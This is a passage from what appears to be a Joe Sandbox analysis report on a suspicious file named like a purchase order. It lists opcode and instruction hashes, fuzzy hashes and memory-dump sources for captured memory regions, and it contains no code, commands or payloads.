                                              • Instruction ID: b44f790e2d7524fd062675a7209b5b68039e7c1bc549593e02664c4d173924be
                                              • Opcode Fuzzy Hash: def6094195b33aff40d52468de17f4573497094a0d75f98d1fc1098423ffb331
                                              • Instruction Fuzzy Hash: 7E31C2B4D04609DFDF0ACF96D548BADBBF6BB49300F209499D419A7390D3349A85CF54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d6b9ec309de8a6967c97cb3e229839bdc07fc5c25928f27217ee069de75076c
                                              • Instruction ID: f4411465dee41d459e2bc393a01b721c81174db9beb75a0cc16e826ab1fa5afb
                                              • Opcode Fuzzy Hash: 5d6b9ec309de8a6967c97cb3e229839bdc07fc5c25928f27217ee069de75076c
                                              • Instruction Fuzzy Hash: 2D319134A84109CFEB10EF54D4447E977F2FB88315FA891B5C00DAB254D7B49982CF66
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3cd211e0bb246c622f9b792537b0d810fcc37b6def8c63ee5ba8d55cc418ae88
                                              • Instruction ID: 5239342570bd2ba4bb0ae3de4220160cd2f8c60b2430d6fff1bceb18116202d8
                                              • Opcode Fuzzy Hash: 3cd211e0bb246c622f9b792537b0d810fcc37b6def8c63ee5ba8d55cc418ae88
                                              • Instruction Fuzzy Hash: A1216B71200B458FE325CF2BD484396BBF2BF84324F54CE6DD49A8A6A1E778A584CB51
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67095e7e1d1e4d0d5fda57c03c105be7375b904023345cf7a6890fd4a03a8e2c
                                              • Instruction ID: 7ce585c50120480235efb01cc270a212b16a978313e4f82f8e525cf8737cdc77
                                              • Opcode Fuzzy Hash: 67095e7e1d1e4d0d5fda57c03c105be7375b904023345cf7a6890fd4a03a8e2c
                                              • Instruction Fuzzy Hash: 932155B5D05219CFDB08DFA6D4096EEBBFAFB88311F10A46AD405B3210D7745A44CBA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8a9e049747aa2e9d50bc03ca1f08a8b44f1ae44b195e7f29e0f542b12094743f
                                              • Instruction ID: 8d00773f8a95ace6ab40810f19867e082ce7e7b72e8c4a5584baa37a03832843
                                              • Opcode Fuzzy Hash: 8a9e049747aa2e9d50bc03ca1f08a8b44f1ae44b195e7f29e0f542b12094743f
                                              • Instruction Fuzzy Hash: 092162B13042549FCB05CF6AC894AAA7FEAFF8D210B054899F855CB3B1DA31EC41CB20
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e0599c64fdd71e40a7977176da2cfd8c22954d61922b54fb991be52ad9e565c7
                                              • Instruction ID: d21f0255442bf73ba7d54766816f971288d74c625c8a4ad075cedb52134d0904
                                              • Opcode Fuzzy Hash: e0599c64fdd71e40a7977176da2cfd8c22954d61922b54fb991be52ad9e565c7
                                              • Instruction Fuzzy Hash: 01214874D05219CFDF08DFA6D4086EEBBFAFB88311F10A82AD405B3210D7741A44CBA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6bdc3dd8ce5cf538b3d805c1d49dd2296b8355969ce5d52730855be248113907
                                              • Instruction ID: 13a852484254d9e46b2d1576b1f5941ea7258bcf9df0568dfe82840e4812b39d
                                              • Opcode Fuzzy Hash: 6bdc3dd8ce5cf538b3d805c1d49dd2296b8355969ce5d52730855be248113907
                                              • Instruction Fuzzy Hash: 95210871A002098FDB04DF98D545ADDBBF2FF88301F1049A8E445BB261CB72AE84CBA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 843c538bd0301dd28a4b487f4f8f4b18b7cbf6e3b11adc7c3ccaf7c2be9f363d
                                              • Instruction ID: fd740f14bf10d72d3d3c16dcb3873a30841f3c6d9d2416dbbc34e62c406abc61
                                              • Opcode Fuzzy Hash: 843c538bd0301dd28a4b487f4f8f4b18b7cbf6e3b11adc7c3ccaf7c2be9f363d
                                              • Instruction Fuzzy Hash: 2F210CB0D0420ADFDF08DFAAD4546AEFBB6BB49301F5485AAC415A7250D7349A85CF90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 61832dbb5d6ebd6e8519a455ec438444489a5bfacfb3bf374e20603a20515f2b
                                              • Instruction ID: 392e842cba80595f171398e2a0b713e0e9d28991d228e043ce2843724c235256
                                              • Opcode Fuzzy Hash: 61832dbb5d6ebd6e8519a455ec438444489a5bfacfb3bf374e20603a20515f2b
                                              • Instruction Fuzzy Hash: 9F21A179A0061ACFCB14DF65C984A7EBBF2FF88211F0049ADD946A7310E730D941CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cc4e9f3c3acfff1054c33af44ca6e73a7ae54d8fb635bad0f02daf77ddfefb1d
                                              • Instruction ID: 20c52516a10feb7ce35ae66d2a40cf165a47490ea8202433e061c2ece34216ac
                                              • Opcode Fuzzy Hash: cc4e9f3c3acfff1054c33af44ca6e73a7ae54d8fb635bad0f02daf77ddfefb1d
                                              • Instruction Fuzzy Hash: 57217C35A002189FDB15DFA9D448ADD7FB2BB8C320F189529E412A7390DB318C81CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 520ef1b27eb2ad790f10e405ff1423e69b6b5df422b12cae6326930dbda131c9
                                              • Instruction ID: 7206ee205a62caba5f1892ff87ab43df640d1598fb256d45f04260036f475c09
                                              • Opcode Fuzzy Hash: 520ef1b27eb2ad790f10e405ff1423e69b6b5df422b12cae6326930dbda131c9
                                              • Instruction Fuzzy Hash: 0A217F79A0061ACFCB14DF65C984A7EBBF2BF88215F0049ADD956A7310E730D941CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c9fabd652c27e59fe387fa67944ed87262ead7d0f3075e912a7000d0b88f5b6a
                                              • Instruction ID: c8e94572f24a829607f5fe409f9002909a30f0a3d36ddd93e21763f60468028f
                                              • Opcode Fuzzy Hash: c9fabd652c27e59fe387fa67944ed87262ead7d0f3075e912a7000d0b88f5b6a
                                              • Instruction Fuzzy Hash: 3A317F78A012289FCBA5DF58C884AD9B7F1EB48301F14C4EAE818A7350DB359FC58F50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b55c9f8694827c2dd0fac3e1e8e393eec85b63048bb3ec04ca476737d78d1a5c
                                              • Instruction ID: 2ff6370267c51a05313c78be4cad620387e0c23d6d40f3bca1e0f4a7ee61442e
                                              • Opcode Fuzzy Hash: b55c9f8694827c2dd0fac3e1e8e393eec85b63048bb3ec04ca476737d78d1a5c
                                              • Instruction Fuzzy Hash: C621F475E00209DFCB09DFA9E8506EEBBF2FF88211F24806AE405A7364DB355952DF54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a33251551d89e584783552d68d13fba1a205b8d726fff078ff769b9b9ac51899
                                              • Instruction ID: e46b760846082d63b782c13ad96dbfad67e88d84f401f9ba84b12139742d76f6
                                              • Opcode Fuzzy Hash: a33251551d89e584783552d68d13fba1a205b8d726fff078ff769b9b9ac51899
                                              • Instruction Fuzzy Hash: 1531D278E06628CFDB64DF58C884B9AB7B1BB48305F1145EAD809A7784D7349EC0CF51
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1ade8b64cdd3dedf2cb2d3b799067542992a5b9fb077a5dcd482f63896536f20
                                              • Instruction ID: cd74910d18afb715f22417b049a350b7db2971b37e44398a3fd58f41d33f29ea
                                              • Opcode Fuzzy Hash: 1ade8b64cdd3dedf2cb2d3b799067542992a5b9fb077a5dcd482f63896536f20
                                              • Instruction Fuzzy Hash: 09213778D45208DFDB08EFA9D4497ADBBF1EB49306F2084A9D40AAB240EB340994CF55
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f3475e4f4080e4b9f1fd5c5c8ab1f6b14209c46676a0d5a8fc2b935757134c84
                                              • Instruction ID: 53c7c7ce67f03d013ce43f4cd6bd599f2802dd1f40186b1afc0d42486752b380
                                              • Opcode Fuzzy Hash: f3475e4f4080e4b9f1fd5c5c8ab1f6b14209c46676a0d5a8fc2b935757134c84
                                              • Instruction Fuzzy Hash: F221A174A102158BD714EBB8E455BAE7BF6FB88700F50896DE00AC7685EF7059058FD1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e41fc8e2d6c12934a1a9d9071159cbaf58a5168b2119e23eee57fe0244a22a73
                                              • Instruction ID: c6fc096231333774aa49f5f4544db488d8252becde107e0e2187961f76eff9f7
                                              • Opcode Fuzzy Hash: e41fc8e2d6c12934a1a9d9071159cbaf58a5168b2119e23eee57fe0244a22a73
                                              • Instruction Fuzzy Hash: FB213878D41208DFDB08EFA9D4497AEFBF1FB49305F6084A9D406A7240EB340994CF55
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485533832.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5ca0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dda538bec3ea11f2b0ce5bbfa29880a36747428227dab821f24cbab9dbda6431
                                              • Instruction ID: 531d42ee900a1765cb7149fc0b11419f742048a819e0bdf8ad3a7122b7c7048d
                                              • Opcode Fuzzy Hash: dda538bec3ea11f2b0ce5bbfa29880a36747428227dab821f24cbab9dbda6431
                                              • Instruction Fuzzy Hash: F3213E36E0425ACFDB18CFA9D5486FEBBB2FB44309F148469D422B7250DB345A81CF90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 523ac2a26fb1d04dbb29b386da5046d245eec0122fe2f716e1276c1696102ee7
                                              • Instruction ID: 289dac42d8f133168c23ddb0684cf8f939d255e73eb59129b22513a0f820a50d
                                              • Opcode Fuzzy Hash: 523ac2a26fb1d04dbb29b386da5046d245eec0122fe2f716e1276c1696102ee7
                                              • Instruction Fuzzy Hash: D601496170D7B94FC72202685C94651AF61AB8B50435518EFF4CBCF392E4468DCB9390
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3843fca2763ee0cfa2e57fce64cb7571d43b06cc72fe2fb9e78e0c729fadb3dd
                                              • Instruction ID: 1448e165f68adbdd47c9c40a1d8dc2ff00b10759f5733fe4081109db9b7c8e57
                                              • Opcode Fuzzy Hash: 3843fca2763ee0cfa2e57fce64cb7571d43b06cc72fe2fb9e78e0c729fadb3dd
                                              • Instruction Fuzzy Hash: 371123B0D40229CBDB14DFAAD844AEEBBF6EB89314F10802AD515B3290D7705A55CFA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b69b88a91af9ce17f445c88bb389a0e3480a62b97a27716b21a75754ae46b5a6
                                              • Instruction ID: bb1d9f228b00550eefd51298dc8be3b974a3a80b3114f33aec6e016692060e53
                                              • Opcode Fuzzy Hash: b69b88a91af9ce17f445c88bb389a0e3480a62b97a27716b21a75754ae46b5a6
                                              • Instruction Fuzzy Hash: AA11C639B003049FCB14DFA98855BAE7FF2EB88710F1444ADE586DB380DA74C941CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 53fadc6cc32cfaeb6bcc933834b7d3acf4f53cb9df54ce98a0066807c920269b
                                              • Instruction ID: b1d1746b989477ac9efd01facd7b25fb75dc44ec440f4878e5173acb273397de
                                              • Opcode Fuzzy Hash: 53fadc6cc32cfaeb6bcc933834b7d3acf4f53cb9df54ce98a0066807c920269b
                                              • Instruction Fuzzy Hash: EE11042070D7C84FC71683BDA8525A67FB1AF8BA1874458DFE08ACB692DA215C45C3A2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 32cd43bc1edf3c4de0559a560ddfb2662277c48c7f317c6e1767ae70030c2d7d
                                              • Instruction ID: 7ea77dfc96f3de3ec00f56ce993dcd79eae0c0e76c6b32a1527c3e6424efd616
                                              • Opcode Fuzzy Hash: 32cd43bc1edf3c4de0559a560ddfb2662277c48c7f317c6e1767ae70030c2d7d
                                              • Instruction Fuzzy Hash: BF215078A42219DFDB04DFA8D594EADBBF2BF49710F204498E906EB361CB30AD41DB54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472191074.000000000265D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0265D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_265d000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2f01e5f1659ed64de2dcc6f226e42ecfc18c18a3f275a02967475ac6a1a18fc9
                                              • Instruction ID: b59975ec0506656e08476894ef3068e696564a5ff936274ccad8596fbcf8b881
                                              • Opcode Fuzzy Hash: 2f01e5f1659ed64de2dcc6f226e42ecfc18c18a3f275a02967475ac6a1a18fc9
                                              • Instruction Fuzzy Hash: 52118E76504284DFCB15DF14DAC4B16BF61FB88314F24C6AADC094B696C33AD45ACBA2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b4e3d16027eb53013e2cd1d1dc4ea559d3f5caa7b1d81eeb6bbae3c7dffe12fd
                                              • Instruction ID: 4ae12d266bf6132fa14e3f10441def39fe7bcc1592c11ce4f242ad129ea83dc8
                                              • Opcode Fuzzy Hash: b4e3d16027eb53013e2cd1d1dc4ea559d3f5caa7b1d81eeb6bbae3c7dffe12fd
                                              • Instruction Fuzzy Hash: 2A11A079B102108FCB14DFA8C851BAE7FF2EB88751F1445ADE596DB280DA74C941CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dc723bf5c6db607fc92b1a00d2e5beaae4d15026c0bfb61fc99feaf072fd5339
                                              • Instruction ID: 1705a2d24d4aa09f43ac150a60608543c6da224a7d80e92049ec88d7118e4130
                                              • Opcode Fuzzy Hash: dc723bf5c6db607fc92b1a00d2e5beaae4d15026c0bfb61fc99feaf072fd5339
                                              • Instruction Fuzzy Hash: F0118F34A8410ACFDB14EF84E0487E977F2FB48305FA495B5C00DAB254D3B49986CB66
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1081277662ca66420ab01be65d35fa4710e55a0778d760a9d67c081a7b984ee2
                                              • Instruction ID: 88595acd793d9cabd3de83d9bb00e0536fce4938249f3d4c6a71e7b46ba1c4a0
                                              • Opcode Fuzzy Hash: 1081277662ca66420ab01be65d35fa4710e55a0778d760a9d67c081a7b984ee2
                                              • Instruction Fuzzy Hash: DA01883A340214AFD7109E59DC84F9A7BA9FB89721F10406AFA15CB290CA71D801CB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eb776772fe1088853f628dd6c5635c91dc0241cb7ab84e8850e4094526542bf0
                                              • Instruction ID: 0a60b52f5ccc06b73d87bc9f49c7f339d2273b5b1af0c6a73922306e0349123b
                                              • Opcode Fuzzy Hash: eb776772fe1088853f628dd6c5635c91dc0241cb7ab84e8850e4094526542bf0
                                              • Instruction Fuzzy Hash: E401F57A3083808FC7068B75CC98E593FA1BF5622075949EFE595CB2A2DA648809C721
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3fe49b2aa961829ba96aa76d280d6ff3236fd91c2e970417699f6310f0ac1e08
                                              • Instruction ID: 7cd371a2b0194f2db148277efb0d24e9251e17a676cef1d6795b23ff4749c151
                                              • Opcode Fuzzy Hash: 3fe49b2aa961829ba96aa76d280d6ff3236fd91c2e970417699f6310f0ac1e08
                                              • Instruction Fuzzy Hash: FA1170B4D01219DFCB44DFA9C544AAEFBF1EB48301F1084AAD829A7350D7349A41CF91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e262a6212964775d796727d7d3c6eec9386cd7935146c6409ae8f42dbec428e6
                                              • Instruction ID: faa05be4fce98db0c7e95c383b7e2562b6eaa261baf85227d708254a22d020e6
                                              • Opcode Fuzzy Hash: e262a6212964775d796727d7d3c6eec9386cd7935146c6409ae8f42dbec428e6
                                              • Instruction Fuzzy Hash: FE012279700640DFC706DB24E15891A7FB2AFCA71171085AAE5468B3A1CF71DC42CB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6aa24b4fe1efe1cffdf07f47395a1cbcc33d0530605a095d9a32201e8cd88626
                                              • Instruction ID: 2157b6b47f40ad8126cb15727946c08845f04184a870e346de1559547e6b5a00
                                              • Opcode Fuzzy Hash: 6aa24b4fe1efe1cffdf07f47395a1cbcc33d0530605a095d9a32201e8cd88626
                                              • Instruction Fuzzy Hash: A2119A70D04218CFEB58DF26C8407DEFBB6AB89312F0094A88919B3254DB302A848F50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e573255e48be94a7177f2303cf4ec920a86d72a32676735e85c905c90c8a8c8f
                                              • Instruction ID: 75f07ec49e9dc7733306a43146efafa5ce4824283e5005ae748f12cf490594af
                                              • Opcode Fuzzy Hash: e573255e48be94a7177f2303cf4ec920a86d72a32676735e85c905c90c8a8c8f
                                              • Instruction Fuzzy Hash: E801DB71200348AFD710DB2AEC80DD7BB7DFBC4A14B00897FF4168B555EBB0A94887A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 046db0e4360ef0ca71e72cc9b5f5263729b5b50ca42c502d27baaf1f097635ec
                                              • Instruction ID: d4632efe14de1db607af3e65b809db99c44f9779aa7ff69b650d8e3c18001b33
                                              • Opcode Fuzzy Hash: 046db0e4360ef0ca71e72cc9b5f5263729b5b50ca42c502d27baaf1f097635ec
                                              • Instruction Fuzzy Hash: 5A01D1353002009FC7159B25E454D267FAAFFCAA11B1544AEF956CB3B0DE31EC01C750
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3e440e8fecf3ee22fb768d08d4ae0c7bebc10a1ff43aaddeaec633492bfa0f65
                                              • Instruction ID: 3b7274c675a4eb7c73526c745e8667387b460659a26871e17120a7603060fd3d
                                              • Opcode Fuzzy Hash: 3e440e8fecf3ee22fb768d08d4ae0c7bebc10a1ff43aaddeaec633492bfa0f65
                                              • Instruction Fuzzy Hash: 44010CB0D04309DFEB48DFAAD4456AEFBF5AB49300F1495AAC419E3240D7709685CF91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2f8a4353827643f6283f25058e49ba549bf9a90d399716022bf8c5c7c73d5b7f
                                              • Instruction ID: dc788ecde39a67432b27b68341c95e80083e280234c61dcf86eff0153bc0bef6
                                              • Opcode Fuzzy Hash: 2f8a4353827643f6283f25058e49ba549bf9a90d399716022bf8c5c7c73d5b7f
                                              • Instruction Fuzzy Hash: E5F0F930B441509FD3149738A4595AE37E3DBC9320F6584AAD04AC7361CE708C43CB11
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
